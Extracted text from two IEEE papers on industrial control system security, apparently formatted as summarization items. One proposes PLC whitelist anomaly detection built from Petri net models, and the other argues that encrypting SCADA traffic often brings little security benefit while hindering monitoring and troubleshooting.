actuator. Therefore, it can be considered that behavior of sensor and actuator to be an actual movement of control system. Hence, if behavior of sensor and actuator can convert to the discrete time, it can model the actual movem ent of control system via Petri net. Previous study [4] considered the modeling FA (Factory Automation) via Petri net. D. The Example of Modeling In this study, as one example, we model the Ball -Sorter control system [10] as shown in Fig.5. The function of Ball-Sorter is sorting balls according to their weight as a normal operation . We use a ping -pong ball as a light ball, and a golf ball as a heavy ball. Fig. 6 shows the schematic of Ball-Sorter. Ball -Sorter has three air cylinders (Cylinder1, Cylinder2, and Cylinder3), one sorting sensor (S -sensor), and three proximity sensors (P -sensor1, P -sensor2, and P-sensor3). When the ball is a ping -pong ball, Ball -Sorter sort the ball to BOX1. When the ball is a golf ball, Ball -Sorter sort the ball to BOX2. M 0 (1) Fig. 1: Petri net Fig. 2: Self -loop Fig. 5: Appearance of Ball -Sorter system Fig. 4 : Timed Petri net Fig. 3: Inhibitor arc 1767 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. When model the Ball -sorter, we define that transition firing as ON/OFF operation of actuator and sensor. We m odel the Ball-Sorter so as to represent the event order in normal operation. Fig. 7 shows the Ball -Sorter Petri net model . Table. II and Table. II I shows the names and the meaning of transition and state in Fig. 7. III. LADDER DIAGRAM Ladder diagram is one of programming language that represent a program by a graphical diagram based on the circuit diagrams of relay logic hardware. This ladder diagram s used to develop software for PLC used in control system. Global standardization on PLC based on t he internatio nal standard IEC 61131 -3 is ongoing [1]. PLC based on this international standard can be programmed by FBD (Function Block Diagram), IL (Instruction List), and ST (Structured Text) not only ladder diagram. In this study, we use ladder diagram which is the most common program and FBD which can program the PLC not based on IEC 61131 -3 in most cases. Fig. 6: Schematic of Ball -Sorter control system Table II. Transition Transition Meaning behavior Psensor1_on P sensor1 turn ON Psensor2_on P sensor2 turn ON Psensor3_on P sensor3 turn ON Ssensor_off S sensor turn OFF Ssensor_on S sensor turn ON Cylinder1_on Air cylinder 1 turn ON Cylinder1_off Air cylinder 1 turn OFF Cylinder2_on Air cylinder 2 turn ON Cylinder2_off Air cylinder 2 turn OFF Cylinder3_on Air cylinder 3 turn ON Cylinder3_off Air cylinder 3 turn OFF Table III. Place Place Meaning of state buffer Buffer Cylinder1_on Air cylinder 1 ON state Cylinder1_off Air cylinder 1 OFF state Cylinder2_on Air cylinder 2 ON state Cylinder3_on Air cylinder 3 ON state Psensor1_on P sensor 1ON state Psensor2_on P sensor 2ON state Psensor3_on P sensor 3ON state Ssensor1_off S sensor OFF state Ssensor2_on S sensor ON state Fig. 7: Petri net model of Ball -Sorter [0,3] [0,3][0,3] [0,3] [0,3] [0,3] [0,3] [0,3][0, ] [0, ] [0, ]1768 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. IV. CONVERT THE PETRI NET TO LADDER D IAGRAM In this section, we propose the way to convert the Petri net model to ladder diagram with a constraint condition of Petri net. As normal operation of Petri net model, when the transition T fired, the marking token x in input place move to the output place following direction of arc F and weight function W. A transition t can fi re only when each input place p of t is marked with at least w (p, t) tokens. Therefore, when abnormal operation of based Petri net model like Fig. 1 is occurred, equation (1) is not satisfied as a result. When equation (1) is not satisfied, it can regard that the abnormal operation of control system is occur red. Accordingly, it can detect the abnormal operation by adding the diagnostic function which diagnose equation (1) not only converting the Petri net to structure ladder diagram. In the light of abnormal operation of self-loop like Fig. 2. This abnormal operation is the transition fire when the place which is connected to self -loop has no marking tokens. Therefore, to detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of self -loop. In the light of abnormal operation of the model using inhibitor arc like Fig. 3. A transition which is connected to inhibitor arc can fire only when an input place has no marking. Hence, abnormal operation of the model using inhibitor arc is that a transition which is connected to inhibitor arc is fired when an input place has no marking. Therefore, to detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of inhibitor arc. In the light of abnormal operation of Timed Petri net like Fig. 4. A transition in timed Petri net can fire after a specified Table IV. Petri net and Structuring Ladder Diagram Constructs Petri net Ladder Diagrams Based Petri net Self-loop Inhibitor arc Timed Petri net 1769 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. time between at and bt. Therefore, one of the abnormal operation s of timed Petri net is that firing time for transition is not between at and bt. To detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of timed Petri net. Table. IV shows the example of conversion from Petri net model to ladder diagram. ADD, SUB, LT, GT, EQ and TON are F B. ADD represent an adder. SUB represent a subtractor . LT, GT and EQ represent comparator >, <, =, respectively. TON is an ON delay timer . Number of marking tokens x is defined as integer . It is necessary to discretize input and output of sensor and actuator by using function which differentiate the rise of a signal like Fig. 8, because Petri net is a discrete -time model . Output of ladder diagram Attack is detection output of abnormal opera tion. Turning on the output Attack means that ladder diagram detects the abnormal operations. It can convert the Petri net model to ladder diagram following exa mple in Table. IV , because Petri net model which is shown in Fig. 7 is con stituted of example s in Table. IV. In this study, we converted the Petri net model shown in Fig. 7 to ladder diagram. Space did not permi t us to insert the converted ladder diagram V. EXPERIMENTAL VERIFICA TION In this section, we show the capability of PLC white list by experim ental verification. The experimental used the Ball-sorter shown in Fig. 5. A. Method There are various cyber -attacks m ethod targeting PLC such as propagating through a network or connecting directly . After all, these cyber -attacks make falsification of in ternal variable with PLC or illegal rewriting program. Therefore, w e carry out the following three experiments of normal operation and cyber -attack incident. Exp.(i): Normal operation (no cyber -attack) Exp.(ii): Abnormal output of actuator command Exp.(iii): Falsification of part of a program Normal operation in Exp.(i) is thrown in 4 balls. Table. V shows the ball sequence thrown in Ball -Sorter. In Table. V , P represents Ping -pong ball, and G represents Golf ball. Incident Exp. (ii) is caused by command from e ngineering device. Incident Exp. (iii) is falsification of ladder diagram to sort the golf ball to BOX1. B. Result Fig. 9 -11 shows the time series plot of abnormal output in Exp. (i) -(iv), respectively . Its vertical line shows the anomaly detection output , and the horizontal one the time. Taking anomaly detection output value 1 means that the system detects the abnormal operations. In Exp. (i), PLC did not detect the i ncident, because abnormal output did not take a value 1 in Fig. 9. In Exp. (ii), this result represents that PLC detected t he incident at the 5 second, because abnormal output took a value 1. In Exp. (iii), this result represents that PLC detected the incident at the 8 second, because abnormal output took a value 1. From the result of these experiments, we confirmed the effectiveness of the proposed detection method. Fig. 8: UP contact Table V. Ball sequence Input sequence 1 2 3 4 Ball P G P G Fig. 11: Exp.(iii) Falsification of part of a program Fig. 9: Exp.(i) Normal operation Fig. 10: Exp.(ii) Abnormal output of actuator command 1770 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. C. A Load to The PLC In this study, we measured a load to the PLC by white list. Table. VI shows the load to the PL C with and without white list. The total number of steps means the number of lines in ladder diagram. Scan time means the amount of time it takes for the PLC to make one scan cycle. The scan cycle is the cycle of which the PLC gathers the inputs, runs a ladder diagram and then updates the outputs. VI. CONCLUSION We proposed the method to apply a detection function to PLC. PLC can have the white list by converting the Petri net model which is modeled the behavior of field device to a ladder diagram. In addition, we verify the capability of proposed detection function through the actual experiment. However, this study method is necessary to model the control system via Petri net manually. It is need the time and costs to model the complicated system. In future, it is necessary the method to model the control system automatically from the logs [12] .
Summary:
Rece ntly, defensive countermeasures of controller are important because cyber -attacks on the control system are growing highly . This paper propose s an anomaly detection method of white list using PLC (Programmable Logic Controller ) as one of the countermeasures of controller. This paper introduces a white list design technique which models normal behaviors of field devices via Petri net and converts the white list model to ladder diagram. It allows PLC to detect the cyber -attack.
|
Summarize:
I. I NTRODUCTION SCADA (Supervisory Control and Data Acquisition) sys- tems and DCS (Distributed Control Systems) form an impor-tant subset of ICS (Industrial Control Systems), overseeingcomplex physical processes in industrial and critical infras-tructures which usually span over a large geographic area(e.g. a pipeline, an electrical grid). Over the last decades,ICS have evolved from largely isolated systems to largelyinterconnected ones, boosting ef ciency but opening up thepossibility of cyberattacks; indeed, in the last decade, wehave witnessed a number of attacks on ICS [5], [25], [10],[7], [23], [4], [12], [30], [31], [15], [2]. The response from the ICS community has been to in- crease the attention to the security mechanisms already in place, and to look for new ways to defend against maliciousentities. One of the proposed mechanisms to secure ICS is toencrypt communications transmitted over SCADA networks.A few proposals are on the table and, at the time ofwriting this article, there is a committee discussing a possible standardization for the use of encryption on ICS networks. It is well-known that security always comes at a cost, which is not only monetary, but also in terms of e.g. usability of the system [27]. It is therefore important to evaluatewhether a solution is actually worth its costs. To make suchan evaluation one has to take into due consideration theattacker model at hand, the possible attacker model in the future, and the business model of the stakeholders in the ICS. This paper aims at contributing to the discussion on the pro s and con s of network encryption for ICS by providinga basis for analysing the costs and the bene ts of such asolution. We determine key threats by considering recentreported ICS attacks. As the business model of the speci ctarget ICS will also in uence the discussion, the reasoningand the conclusions of this work have to be instantiated intelligently to the various application elds. Yet there aresome generally applicable conclusions we believe apply to ICS architectures in general. The rst conclusion is that, in most cases, introducing encryption (in the ICS internal network) does not yieldextra security. None of the attacks we considered wouldhave been blocked or made more dif cult by the additionof encryption. Encryption aims at mitigating con dentialityleaks on the wire , while the witnessed attacks target end- points. Also, in many of the attacks, con dentiality is notthe security goal being breached. We know of no record of an attack on the wire occurring in practice, whilemany damaging hypothetical attacks may be mitigated byauthentication checks rather than encryption. The second conclusion is that encryption can actually have negative consequences for security. For instance, manyattacks can be detected with state-of-the-art Network Intru-sion Detection Systems (NIDS), provided that the NIDS hasaccess to the communication contents. Of course, one canimplement encryption with appropriate taps for intrusion detection, but this adds to the cost of the solution. The third and last conclusion is that encryption can considerably raise the costs of troubleshooting and recovery.For instance, problems (e.g., communication troubles, re-transmissions, failing devices, etc.) can be identi ed (much)more quickly and easily in an unencrypted network than in an encrypted one. We do not advocate completely ruling out encryption of ICS network traf c: in some cases it makes a lot of sense (forinstance, long-haul connections over untrusted networks, and in systems operating in an adversarial environment). Instead, we advocate healthy reasoning on what encryptionis actually good for, and what are its costs, particularly interms of the loss of safety and security it may actuallyintroduce . Note also that in most situations in the ICS world, one only needs to achieve authentication and integrityof the communication, and this can be done without full- edge encryption (the latter being needed only to guarantee con dentiality.) In the remainder of this paper, we rst establish the setting in Sections II-IV by providing a general descriptionof SCADA systems, their key security requirements relatedto encryption and the main cryptographic protocols beingconsidered for use as standards for SCADA systems. Next,we determine key threats by looking at recent attacks onSCADA systems in Section V. We then support each of thethree conclusions above in Sections VI-VIII before providing 1IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 978-1-5386-4055-5/17/$31.00 2017 IEEE 289Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. conclusions in Section IX. II. SCADA SYSTEMS OVERVIEW In this section we introduce the basics, the architecture and the communication strategies of SCADA systems as a basis for the security discussion in the following sections.Both ICS and SCADA systems monitor and control physicalprocesses. A key feature of SCADA systems is that they op-erate over multiple geographical locations and, as such, their communication networks need to span over large distances. Engineering Station HMI Station Corporate Network Firewalled gateway/router Interoperability Server Database Server Application Server RTU/ PLC Control Center Relay RTU/ PLC Pressure sensor Level alarm Valve Ammeter Remote Station 1 Remote Station 2 Fig. 1. Simpli ed architecture of a SCADA system1 Figure 1 presents a simpli ed model of an industrial con- trol system connected through a SCADA network which issuf cient for our purposes. Several geographically distributed remote stations are interconnected with a control center. This could be through a dedicated link or via the Internet. Each of the stations deals with a different part of a physical process, gathering data through sensors (e.g. thepressure sensor in Remote Station 2), and/or controllingthe process through actuators (e.g. the valve at the samestation). These end devices are monitored and controlledover a local network by Programmable Logic Controllers(PLC) and Remote Terminal Units (RTU). These are inturn interconnected to each other, possibly in hierarchicalmaster/slave architectures or across remote stations, in orderto coordinate the monitoring of the process. Often industrial systems also have a dedicated control center (CC) to govern the entire process. A typical CCconsist of different components, such as SCADA applicationservers to monitor and control the process, Human-MachineInterfaces (HMI) for operators to interact with the SCADAsoftware, database servers with historical records, or interop-erability servers (using standards such as IEC 61850 or OPC-UA, de ned in IEC 62541 [6]) for interconnecting SCADAsoftware and hardware devices from different vendors. TheCC is usually physically separated from other parts of thesystem, and relies on a gateway/router to communicate withthe remote stations. Originally, the connection between the CC and the remote stations was done through narrowband radio, dedicated wiredlinks or even satellite systems. The need for integration ofservices (i.e. rmware update, remote access) has removedthe tight separation between SCADA and business networks; 1Icons source: www.vrt.com.au/downloads/vrt-network-equipmentand to standardize communications over all these differentphysical media, SCADA networks are moving to using IP-based networking [20]. For backwards compatibility, mes-sages are repackaged into a TCP/IP wrapper allowing reuseof message formats and existings protocols, such as Modbus.A router/gateway at each remote station serves as interfacebetween IP-based networks on the outside and the eldbus protocol-based SCADA networks on the facility oor. The communication between the control center and de- vices within remote stations can be categorized into fourtypes [33], namely: data acquisition requests, rmware up-load, control functions and broadcast messages. These dif- ferent types of messaging are usually implemented through arequest/response model with clear text messages, following a device vendor proprietary communication protocol. With these main ICS/SCADA network components in place, we next look at the security needs of such systems. III. S ECURITY PROPERTIES AND ENCRYPTION Encryption is often seen as a method to improve the security of a system. However, to really evaluate the securityof a system we rst need to know its security requirements. Capturing security requirements (for ICS). The security requirements for an ICS can be expressed using the classic C.I.A. triad of con dentiality, integrity, and availability,along with authenticity. These are useful to capture thesecurity requirements for any information system. However,priorities of different security requirements in an ICS areinherently distinct from those of a typical IT environment. In ICS, timely process execution availability is the abso- lute priority, especially for critical infrastructure or a coreprocess of the production line [36]. Process availability isachieved through the sub-requirements of network availabil-ity and data correctness, which are also essential to ensurecontinuous monitoring of faults, anomalies, and potentialthreats [11]. Correctness of data sent over an untrustednetwork requires message authenticity , which is a combi- nation of source authentication , i.e. establishing the identity or role of the sender of a message, and message integrity , i.e. assuring data has not been altered during transmission.If the data is valuable, private, or otherwise con dential, wealso need message con dentiality . Traditionally, SCADA networks were built on the as- sumption that only trusted components and entities wouldbe able to connect to them. Thus there were no con den- tiality concerns, and integrity checks against faults were suf cient to also achieve messages authenticity. However,nowadays SCADA networks are more accessible and mayutilize untrusted networks such as the internet, requiringenforcement and validation of message authenticity, and data con dentiality. Achieving security requirements. Different cryptographic techniques may satisfy the requirements mentioned above by concealing and/or validating communications. A common interpretation, which we follow in this paper, of the termencryption (of traf c) is that of obfuscating the content 2IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 290Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. of messages, i.e. enciphering messages for con dentiality. Encrypted messages can then be read only by parties in possession of the appropriate decryption key: typically, thisrestricts visibility to just the endpoints of the connection. Cryptographic techniques can be used to authenticate a party and its messages, for example through the use of publickey cryptography with keys validated by digital certi catesissued by trusted third parties. We will refer to any cryp-tographic technique and key/certi cate management strategyto achieve authenticity as an authentication scheme. Note that, depending on the cipher and the way it is applied, encryption (i.e. enciphering for con dentiality) mayalso help to check the integrity and establish the authenticityof messages; encryption and authentication may be achievedby the same cryptographic operation. However, as we aretrying to clarify the reasons for using speci c techniques,we will still address them as separate requirements. IV . E NCRYPTION PROTOCOLS FOR SCADA ICS standards suggest several protocols to achieve en- cryption. For example IEC 62351 [8], for power systemsinfrastructure, recommends end-to-end protocol TLS andpoint-to-point protocol IPsec; while OPC-UA, for indus- trial automation systems, refers to end-to-end protocol WS-Security. Here we discuss the protocols recommended by IEC 62351 and use them as examples during the discussion.However, the conclusions that we draw in this paper arenot restricted to just these two schemes or the eld of power systems: since we discuss in terms of general securityproperties, the main reasoning remains applicable to the whole eld of securing SCADA networks. According to IEC 62351, Transport Layer Security (TLS) is to be added to the most common TCP/IP industrialprotocols such as MMS, DNP3, and IEC 60870-5-104;moreover, the standard discusses the applicability of well-proven standards from the IT domain, such as IPsec. TLS. TLS creates sessions that provide entity authentication, payload secrecy and message integrity. It accomplishes thisby setting up secure sessions using asymmetric public/privatekeys and digital certi cates issued by trusted third-party entities known as Certi cate Authorities (CA). A MessageAuthentication Code (MAC) is appended to each message ina TLS connection to validate a packet s integrity and avoid replay attacks. The MAC is generated from the message s data payload and a shared secret key. Setting up a sessionconsists of two round trips: the rst authenticates the serverto the client, who validates the server s digital certi catesignature against a list of trusted CA in the client s posses-sion. Client authentication is usually left to the applicationlayer, see e.g. IEC 62351 and OPC-UA. The second roundtrip completes the handshake by negotiating which crypto-graphic protocol to use, along with a corresponding uniquesymmetric session key. This key is used to encrypt thecontent of the messages exchanged during the session: sinceTLS works at the transport layer, it does not encrypt therouting information on the lower network layer. An externalobserver that intercepts a TLS secured datagram is limited inthe amount of information that he can extract from it: only the endpoints of the communications, along with the type ofencryption and approximate size of the data are revealed. IPsec. The IPsec protocol [19] concerns the network layer and can be implemented in legacy networks as a bump-in-the-wire, i.e. without altering the endpoints. An IPsec connection is initiated in two phases, according to the Internet Key Exchange (IKE) protocol: Phase 1 has the purpose of generating the shared secret keying material toestablish a secure authenticated channel between two peers.Using this channel, Phase 2 negotiates the IPsec securitypolicies to be applied to the data ow, and encrypts the data ow using the keys from Phase 1. After the connection isover, those keys are discarded. To authenticate peers, IPsecuses pre-shared keys, or digital certi cate signed by a CA. IPsec provides two extension protocols: Authentica- tion Header (AH)[17] and Encapsulating Security Payload(ESP)[18]. AH offers data integrity and source authenticationfor both IP header and payload. As the packet s content isnot encrypted, it can still be inspected by a rewall or anIDS. ESP offers data integrity, source authentication, andencryption, and is therefore more widely used in practice;note, however, that the ESP protocol is only applied to thepayload and not to the IP header. IPsec is used in one of twomodes: tunnel or transport, of which tunnel mode is recom-mended for establishing secure site-to-site communicationsfrom an untrusted network to the control network in SCADAsystems [29], [34]. In either mode, the payload is encrypted(using ESP) or authenticated (using AH). In tunnel modeheaders are also protected, as the source endpoint encrypts(or authenticates) the entire packet and then encapsulatesit in another IP packet. The receiving gateway will thenperform the unpacking, decryption (or authentication check)and internal routing necessary to transmit the packet to the nal destination device on the trusted network. Tunnel modecan be gateway-to-gateway or host-to-gateway; in either case,the authentication and con dentiality provided by IPsec stopat the receiving gateway and are not fully end-to-end. V. A TTACKS ON SCADA SYSTEMS When checking whether a given approach indeed achieves a security goal, one needs to consider the type of attacksagainst which they are supposed to defend. To create a broadand representative overview on the current threats to SCADAsystems, we have listed (see the rst column of Table I) con rmed attacks on SCADA systems from the RISI incident database [1] and recent V erizon data breach digests [30],[31]. Note that we restrict our attention to real attacks:e.g. [36] gives a list of vulnerabilities and potential misuses,some preventable by encryption, but they do not match whatis seen in practice. We describe three successful attacks in more detail, namely: Stuxnet, causing physical damage to equipment; Dragon y, stealing intellectual property data; BlackEnergy, disrupting a wide public infrastructure. 3IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 291Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. Stuxnet. The Stuxnet malware attack was conducted in 2010, targeting Iranian nuclear enrichment facilities [23]. Stuxnet operated in three stages [14]. In the rst stage, the initial infection was likely con- ducted via an infected USB ash drive from a compromised equipment vendor. Secondly, it spread locally through theSCADA network in three ways: using the normal LAN, viaremovable drives, and by infecting les used by SiemensPLCs. The objective of this phase was to look for computerspossessing the Siemens WinCC SCADA software, typically used to program PLCs, and to establish a foothold onthose machines. The third and nal stage probed for PLCs connected to the WinCC system: once found, malicious codewas injected to stealthily control speci c centrifuges, makingthem operate at unsafe speeds and resulting in a higherbreakdown rate [24]. Dragon y. The Energetic Bear/Dragon y campaign of 2011 focused on industrial espionage and intellectual propertytheft rather than taking control of the industrial process. Itspeci cally targeted industrial gateways and routers used inaviation, energy generation and distribution, pharmaceutical,food and beverage industries [21]. The infection happened in three phases [26], [4]: ini- tially, the attackers delivered malware through spear-phishing emails; then, they performed a watering hole attack byredirecting traf c from legitimate websites; and nally, theyinfected third-party applications that ICS device vendorsmade available online, thus compromising the supply chain.The malware then communicated to a command and control (C&C) server via HTTP , downloaded additional modules es-tablishing persistence, and scanned the local drives collecting information about the network layout, as well as ICS andVPN con guration les, and authentication credentials. Itdid not spread over the local network. Its nal stage wasto use an industrial protocol scanner to search the local network for any OPC services (see Fig. 1), or for devices and applications that were listening on TCP ports of commonSCADA protocols. A compromised OPC could have grantedan attacker full control over the SCADA system, but theattackers made no attempt to control the ICS devices: instead, the gathered data about the SCADA network layout was sent back to the C&C server. BlackEnergy. In late 2015, three Ukrainian power distribution utilities suffered a coordinated attack that caused a blackoutfor several hours [32]. The attack was conducted in two main stages, separated by months [12]: rst, the attackers used phishing emailsto penetrate the utilities IT networks and plant the Black-Energy 3 malware. The malware connected to its C&Cserver, moved horizontally and harvested credentials to gainVPN tunnelling access to the SCADA network; once there,it completed the initial reconnaissance by discovering theserial-to-ethernet eld devices used by the remote stationsto decode commands from the command center. Six monthslater, the attackers used the malware to take control of theSCADA workstations and HMI, locking out operators andmanually issuing commands to open the remote stations breakers, thus causing the blackout. At the same time, theydeployed malicious custom rmware on the gateway devices,disabling them and preventing recovery. VI. W HERE ENCRYPTION FAILS With basic de nitions and a description of key attacks in place, we can now evaluate our rst thesis: encryption often does not yield extra SCADA security. To this end we consider the impact of encryption on the attacks described above. Stuxnet. Recall that Stuxnet comprises three stages. The rst stage, i.e. the initial infection through a compromised USB drive, did not involve network communication. In thesecond and third stages, Stuxnet rst spread on the LAN andthen infected WinCC database servers; the infected WinCCsystems then uploaded control code to the PLCs, as theywere authorized to. However, this code had malicious con-tent. In both stages, all communication were between validparties that trusted each other. The endpoints vulnerabilitiesexploited in the second stage to spread Stuxnet, and themalicious content transmitted to PLCs during the third stage,did not affect the proper establishing of the connections. As such, encryption wouldn t have impeded the attack at all. Dragon y. The Dragon y campaign used standard business level malware techniques, focused on the target s corporatenetwork [21]. Once there, the malware gathered locallystored authentication credentials that enabled authorized ac- cess to other remote industrial systems. In around 5% of theinfections, the malware included a module to capture creden-tials sent over unencrypted HTTP traf c from a browser[4], [3]. Also, the attackers tried to discover and probe OPCservices on LAN hosts, by using the valid interfaces thatwere already present on the infected machines. The situation was the same as with Stuxnet, in that the attackers exploitedvulnerabilities on the end points, while all the communica- tions on the network was between valid parties. Only in somerare cases, encryption would have hindered a small portionof the information gathering performed by the malware. BlackEnergy. The attackers in ltrated a business workstation through email, spread their malware on the LAN, and thenharvested credentials to gain legitimate and authorized ac-cess to the SCADA network, bypassing the security at thegateways of the remote stations. Using existing remote ad-ministration tools, the attackers used native connections andcommands [12] to discover the ICS devices on the remotestations local networks; to upload the custom malicious rmware to the gateways; and to control the breakers througha panel. All these malicious actions compromised endpointsrather than connections, and therefore would not have beenimpacted by encrypting SCADA traf c. As stated before, encrypting a communication channel protects the con dentiality of a message during its transmis-sion. This is relevant in the case where potential attackersreside along the transmission path of the message, eitherintercepting it as a Man-in-the-middle or just passivelylistening to it. On the other hand, if the attackers compromise 4IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 292Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. Brief Description Encr . Net Mon. Y ear Industry Stuxnet Malware Targets Uranium Enrichment Facility [1], [14] X O f,c [24] 2010 Power/utility Russian-Based Dragon y Group Attacks Energy Industry [1], [4] X O f,c [22] 2014 Power/Utility Cyber-Attack Against Ukrainian Critical Infrastructure [1], [12] X O f,c [32] 2016 Power/Utility Malware on manufacturing OT network [31] x O f,c [31] 2017 Manufacturing Hacktivist control PLCs of Kemuri Water Company [30] x oc 2016 Water treatment Public utility compromised after brute-force hack attack [1] x o f,c 2014 Power/utility U. S. Power Plant Infected With Malware from USB [1] x ? 2012 Power/utility U. S. Electric Utility Mariposa Virus Infection [1], [16] x O f,c [16] 2012 Power/utility Disk-wiping Shamoon virus knocks out computers at Qatari gas rm RasGas [1] x ? 2012 Petroleum Gas Company Virus Infection from USB [1] x ? 2012 Petroleum Auto Manufacturer Suffers Data Breach from Virus [1] ? ? 2012 Automotive Process Control Network Infected with a Virus from Laptop [1] x ? 2012 Petroleum Industrial Control System Hacked Using Backdoor Posted Online [1], [15] x o f,c 2012 Other South Houston Water Treatment Plant Hack [1] x ? 2011 Water/Waste Steel plant infected with Con cker Worm [1] x o f,c 2011 Metals Brute-Force Attack on Texas Electricity Provider [1] x of 2010 Power/utility TABLE I ANAL YSIS OF RECENT SCADA INCIDENTS a communication endpoint, as it happened in our examples, it s easy to obtain the keys and con guration les to establishvalid connections to other devices in the SCADA network,and pivot the attack to those. The second column of Table I summarizes the evaluation of the different attacks. For the three attacks studied in detail,encryption did not help (indicated by X in the table). Thesame conclusion can be reached for the others, based on ageneral description of the attack (indicated by x ). In onecase (indicated by ? ) we did not have enough informationon the attack to evaluate whether encryption would havehelped. The table clearly validates our rst thesis; encryptionis not able to stop most of these attacks. VII. T HREA TS OF ENCRYPTION TO SECURITY In this section we evaluate our second thesis: Encryption can have negative consequences for security. Encryption decreases visibility of data, not only for potential attackers, but also for security tools trying to evaluate this data such as network monitoring solutions. With respect to monitoringwe distinguish two main categories; ow-based solutionse.g. [28] that only consider the amounts of communicationand the end-points involved, and content-based solutionse.g. [13], [35] that also consider the actual content of thecommunications. Flow-based solutions may still work if thecommunication is encrypted, but this depends on the exactapproach and the method of encryption. IPSec tunnel mode,for example, would prevent (some forms of) ow-basedanalysis on the link it is applied on. Clearly, content-basedsolutions would be prevented from fully analysing data thatis encrypted with keys the monitoring system does not have. In the third column of Table I we indicate whether the attacks could have been detected by network monitoring,distinguishing between cases (marked O ) where detection is certainly possible, as reported by the indicated publications,and cases (marked o ) where we believe detection shouldbe possible based on a high level evaluation of the attack.All three attacks discussed in Section V could have been detected by an appropriate network monitoring solution. Wefurther indicate whether ow-based (f) and content-based (c)monitoring is involved. Several attacks (marked f,c) can be detected by ow-based monitoring but require content-basedapproaches to identify what type of attack is happening. We have several cases where we did not nd any claims that the attack is detectable with a given approach, and theattacks descriptions are not suf cient to determine whetherknown approaches would work. As such, there are severalcases that are indicated as unknown (?). Still, several attacksrequire content-based approaches to identify or even to detectthem at all. This already validates our second thesis; in manycases encryption hinders other security solutions and thusmay actually decrease the security of the system. VIII. T HREA TS OF ENCRYPTION TO SYSTEM OPERA TIONS In this section we evaluate our third thesis: Encryption increases troubleshooting and recovery costs. To this end we consider several causes that can motivate troubleshooting. Network congestion. Upon slow operator terminal updates one would check the LAN for overload [9, Sec. 8.2]. Quoting from [31]: over the past few months, the net- work seemed sluggish , which the automation engineers andSMEs attributed to older, legacy equipment. [...] With the co-operation of [company], we set up a Switched Port Analyzer (SPAN) port and deployed a passive network analyzer to collect and analyze the traf c. If the traf c was encrypted, this common troubleshooting task would have been hindered. A possible cause for congestion is a device ooding the network, e.g. due to miscon guration or a virus attack. Anexample of the latter was the Con cker worm infecting asteel plant in 2011 [1]: The virus ooded the network withunwanted packets and caused an instability in the communi-cations between PLCs and supervisory stations and freezing most of the supervisory systems. While the presence of the aw is clear, a full diagnosis requires looking at the content of the communication and possibly listening from differentlocations, to identify the source of the anomalous traf c. Non-healthy devices. Upon missing updates, alarms or un- expected behaviour one would evaluate the health of related components. After basic (hardware) checks, [9, Sec. 6.10]recommends checking an individual component s health by 5IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 293Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. using a protocol analyser to look for errors or inconsistencies in its traf c. Components failing health tests should be read- ily replaced: An effective SCADA system should include theproper complement of spare components that the operator can swap out easily for troubleshooting purposes. 2The lower visibility of data induced by encryption can negativelyaffect these health checks, and key management issues canimpact prompt replacement of components. Third-party network access. A common SCADA practice is to hire an external party to evaluate the system, either as partof a health check or risk assessment [31], or for emergencytroubleshooting. As part of this, the external party wouldplug a (possibly unauthenticated) external device (laptop) at different points of the communication network, and evaluate the systems and communication visible there. As even au-thenticated devices do not normally get the decryption keysfor sessions between other devices, encryption might hinderthis practice by limiting what communications are visible tothe external device. The examples above show that encryption increases trou- bleshooting complexity by making analysing problems andreplacing components more involved. The exact impact maydiffer per scenario; a more formal general statement wouldrequire going into SCADA troubleshooting and recoverycommon practices in detail. Still, we believe the issuesobserved above are representative and con rm our thesis thatencryption increase troubleshooting and recovery costs. IX. C ONCLUSIONS This paper is meant as a critical analysis of the pro s and con s of network encryption for ICS. We observedthree general principles: First, in the majority of cases,the introduction of encryption does not yield extra security.Second, encryption can actually have negative consequences for security by hindering other security mechanisms such as NIDS. Third, encryption can raise the costs of trou-bleshooting and recovery considerably. Of course, beforedrawing conclusions one has to consider the criticality of thetarget ICS, as well as its speci c requirements: for example,systems dealing with user data such as advanced meteringinfrastructures (AMI) will need stronger con dentiality. Cur-rently, though, in typical ICS scenarios one needs to achieveauthentication and integrity of the communication (whoseimplementation is easier and has less impact on the generalsystem), rather than the con dentiality offered by encryption.We cannot predict any new attacks or future changes to thethreat landscape that might change this priority. We do not advocate for completely discarding encryp- tion for ICS network traf c, but assert that blanket use of encryption on SCADA networks can prove both costlyand detrimental to security. Instead, careful consideration ofwhat encryption is actually good for, and at what cost, isneeded both for standardization efforts, and SCADA system deployment. 2www.tpomag.com/online exclusives/2013/07/scada troubleshooting tips help systems runsmoothlyREFERENCES [1] RISI Online Incident Database. http://www.risidata.com/Database. [2] APT1: Exposing One of China s Cyber Espionage Unit. Technical report, Mandiant, 2013. [3] Cyberespionage attacks against energy suppliers, version 1.21. Tech- nical report, Symantec, 2014. [4] Energetic Bear - Crouching Yeti. Technical report, Kaspersky, 2014. [5] Annual Threat Report. Technical report, Dell, 2015. [6] IEC 62351: OPC Uni ed Architecture . International Electrotechnical Commission, 2015. [7] Year in Review. Technical report, NCCIC/ICS-CERT, 